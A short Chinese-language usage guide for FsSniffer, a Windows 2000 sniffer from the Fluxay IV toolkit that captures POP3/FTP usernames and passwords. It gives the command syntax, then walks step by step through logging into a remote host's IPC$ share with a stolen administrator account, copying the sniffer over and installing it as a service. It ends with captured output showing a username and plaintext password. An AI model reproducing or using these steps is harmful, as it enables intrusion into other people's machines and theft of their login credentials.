FsSniffer只能在Windows 2000中使用，可以捕捉到本机和基于非交换环境局域网的POP3/FTP用户名和密码。一、本地使用FSSNIFFER -S <Bind IP> <Port> <Control Password>Bind IP：指绑定的IP地址，通常就是本地主机IP地址。Port：控制的端口，以后要通过这个端口登陆上去查看结果。Control Password：登陆时的密码。登陆上去后的命令Show Result：查看捕获的记录Quit：退出ShutDown：结束Sniffer的运行二、远程使用例如：得到主机211.152.188.1的一个属于管理员组的帐号test:test，首先登录。D:\>net use \\211.152.188.1\ipc$ test /user:testThe command completed successfully.将fssniffer.exe复制到远程主机。(也可以用流光IV中提供的工具“种植者”来做这件事情)D:\>copy "d:\My Documents\ShadowSniffer\Release\FsSniffer.exe" \\211.152.188.1\dmin$1 file(s) copied.　利用流光IV中的NTCMD启动FsSniffer.EXE，并将器安装成为服务=============Windows NT/2000 NTCmd Ver 0.1 for Fluxay IV============Written by Assassin, http:// http://==================FluxShadow Remote FTP/POP3 Sniffer Beta 1, Pleased to See You Again!======Flux Shadow Sniffer>show result===========Flux Shadow Sniffer Edition Results===========211.152.188.112(1106)->211.152.188.1(8213) USER zjf211.152.188.112(1106)->211.152.188.1(8213) PASS 1qaz4rfv211.152.188.1(8213)->211.152.188.112(1106) User zjf logged in.211.152.188.1(8199)->211.152.188.112(1107) USER zjf211.152.188.1(8199)->211.152.188.112(1107) PASS 1qaz4rfvTotal 10 Sniffered======================================================小榕软件实验室&#8482; 1995-2001版权所有